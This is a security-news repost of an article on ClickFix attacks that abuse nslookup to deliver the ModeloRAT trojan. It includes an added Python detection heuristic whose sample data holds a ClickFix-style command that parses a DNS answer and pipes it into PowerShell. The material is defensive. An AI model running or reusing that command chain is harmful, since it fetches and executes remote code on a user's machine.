Security News

Cybersecurity news aggregator

MEDIUM Attacks Dark Reading

ClickFix Attacks Abuse DNS Lookup Command to Deliver ModeloRAT

  • What: ClickFix campaigns are abusing DNS lookup commands to deliver ModeloRAT.
  • Impact: Users are tricked into infecting their own machines with the remote access Trojan.

ClickFix Attacks Abuse DNS Lookup Command to Deliver ModeloRAT

ClickFix campaigns have adapted to the latest defenses with a new technique to trick users into infecting their own machines with malware.

Elizabeth Montalbano, Contributing Writer
Dark Reading, February 17, 2026, 4 Min Read

ClickFix attacks have evolved to meet the latest defense measures by using a new command to circumvent security and make people infect their own devices with malware — in this case, a remote access Trojan (RAT) for Windows systems.

Microsoft was the first to notice the change to the attacks, which have been ongoing since 2024, posting on X last week that attackers using ClickFix had come up with "yet another evasion approach" by using the nslookup command instead of the PowerShell or mshta commands that previous attacks have leveraged.

Attackers are now "asking targets to run a command that executes a custom DNS lookup and parses the 'Name:' response to receive the next-stage payload for execution," according to Microsoft. Using DNS in this way reduces dependency on traditional Web requests and allows attackers to "blend malicious activity into normal network traffic," the company said. The attacks can work even in an enterprise environment, making corporate users browsing the Web susceptible.

In the attacks that Microsoft observed, the command kicks off an infection chain that downloads a ZIP archive from an external server; the archive contains a malicious Python script that eventually drops a Visual Basic Script to execute ModeloRAT.
The malware is a Python-based RAT that gives attackers hands-on control over an infected Windows machine.

Same Attack Playbook With a DNS Twist

The nslookup command "exists to troubleshoot network problems, check if DNS is configured correctly, and investigate odd domains, not to download or run programs," according to a follow-up analysis of the attack by Malwarebytes Labs published Monday.

Bad actors using ClickFix apparently have figured out that the mshta and PowerShell commands they were using previously are "increasingly being blocked by security software," Malwarebytes researcher Pieter Arntz wrote. "Nslookup is a built-in tool to use the Internet 'phonebook,' and the criminals are basically abusing that phonebook to smuggle in instructions and malware instead of just getting an address," he wrote.

Aside from this difference, the attacks follow the same playbook at the start, delivering fake CAPTCHA instructions to prove that someone is not a bot and thus giving people a false sense of security that they are browsing the Web safely, according to the post. Following the fake CAPTCHA challenge, attackers typically use deception — either informing people that they must solve non-existent computer problems or install an update to continue; causing browser crashes; or even delivering instruction videos — all in an effort to convince them to self-infect their computers by pasting a malicious command that is meant to solve the issue. Instead, it delivers malware, with previous attacks delivering infostealers or — in the case of abuse of ClickFix by North Korean APTs — backdoors for spying on victims.

These recent attacks demonstrate that cybercriminals have found yet another way to abuse a trusted technical tool to carry out the next step of the attack, which could result in someone handing control of their device over to attackers, Arntz wrote.
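The defensive counterpart to the technique described above is to tell troubleshooting use of nslookup apart from use in which its output is parsed and handed to an interpreter. The following detection heuristic is an added example written for this page; it is not code from Microsoft, Malwarebytes or Dark Reading. The process-creation records are constructed, the field names (image, command line, parent image) are an assumed Sysmon-style shape rather than any vendor's schema, and the domain names are placeholders. The heuristic scores three independent signals the article mentions (lookup output being parsed, the 'Name:' field being extracted, and an interpreter appearing in the same command line) and only alerts when at least two coincide, so that an administrator's `nslookup host | findstr Address` one-liner is not flagged.

```python
"""Heuristic detection of nslookup being used as a payload-fetching step.

Added example. Event fields and sample records below are constructed
(Sysmon Event ID 1-like shape) and are assumptions, not a real schema.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str          # executable path of the created process
    command_line: str   # full command line as logged
    parent_image: str   # executable path of the parent process


# Signal 1: lookup output is consumed by a parser or a pipeline rather than read by a person.
PARSED_OUTPUT = re.compile(r"for\s+/f|findstr|\|")
# Signal 2: the command extracts the 'Name:' field of the DNS answer (the field the
# article says the ClickFix command parses for its next stage).
NAME_FIELD = re.compile(r"name:")
# Signal 3: a script interpreter is invoked in the same command line as nslookup.
INTERPRETER = re.compile(r"\b(powershell|pwsh|wscript|cscript|mshta)(\.exe)?\b")

ALERT_THRESHOLD = 2  # number of signals required before an event is reported


def assess(ev: ProcessEvent) -> list[str]:
    """Return the list of suspicious signals present in one event (empty if none)."""
    low = ev.command_line.lower()
    if "nslookup" not in low:
        return []
    reasons = []
    if PARSED_OUTPUT.search(low):
        reasons.append("lookup output is parsed or piped instead of read interactively")
    if NAME_FIELD.search(low):
        reasons.append("command extracts the 'Name:' field of the DNS answer")
    if INTERPRETER.search(low):
        reasons.append("a script interpreter is invoked in the same command line")
    return reasons


def scan(events: list[ProcessEvent]) -> list[tuple[str, list[str]]]:
    """Return (command_line, reasons) for every event that reaches the alert threshold."""
    return [(ev.command_line, r) for ev in events if len(r := assess(ev)) >= ALERT_THRESHOLD]


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    # 0: ordinary troubleshooting lookup typed into a shell.
    ProcessEvent(r"C:\Windows\System32\nslookup.exe",
                 "nslookup example.com",
                 r"C:\Windows\System32\cmd.exe"),
    # 1: admin one-liner that filters output; one signal only, so no alert.
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 'cmd /c "nslookup example.com | findstr Address"',
                 r"C:\Windows\System32\cmd.exe"),
    # 2: ClickFix-style chain skeleton with placeholder domain: output of a lookup is
    #    parsed for 'Name:' and fed to an interpreter (three signals).
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 "cmd /c for /f \"tokens=2\" %a in ('nslookup lookup.placeholder.invalid "
                 "^| findstr Name:') do powershell -c %a",
                 r"C:\Windows\explorer.exe"),
    # 3: unrelated interpreter use without nslookup; ignored entirely.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -c Get-Date",
                 r"C:\Windows\System32\cmd.exe"),
]


if __name__ == "__main__":
    for cmd, reasons in scan(SAMPLE_EVENTS):
        print("ALERT:", cmd)
        for r in reasons:
            print("  -", r)
```

The threshold is the part worth tuning: in an environment where nslookup is rarely scripted at all, lowering it to one signal trades false positives for earlier visibility, while a second useful enrichment (not shown, since the article does not describe it) would be the parent process, because a lookup launched from a shell a person opened looks different from one launched from a pasted command.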
Advice for Safe Browsing

Indeed, given the proliferation of ClickFix attacks and their continued evolution since Proofpoint researchers first spotted them about two years ago, it's essential that people are aware of the danger that lurks in making unknown changes to their systems via commands delivered through their browser. To that end, Malwarebytes Labs provided users with advice on how to protect themselves.

Firstly, they should take it slow when encountering instructions on a Web page or prompt, especially if asked to run commands on their device or copy-paste code. Arntz warned that some attacks use timers or countdowns for these updates or commands. "Attackers rely on urgency to bypass your critical thinking, so be cautious of pages urging immediate action," he wrote.

People also should always avoid running commands or scripts from untrusted sources such as websites, emails, or messages "unless you trust the source and understand the action's purpose," Arntz wrote. It helps to verify the instructions independently through official documentation or even customer support before taking any action.

ClickFix infections can also be prevented if the use of copy-paste for commands is limited, Arntz noted, since manually typing commands into a system instead of merely copying and pasting them can reduce the risk of unknowingly running malicious payloads hidden in copied text.

About the Author

Elizabeth Montalbano, Contributing Writer

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal.
In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Copyright © 2026 TechTarget, Inc. d/b/a Informa TechTarget.
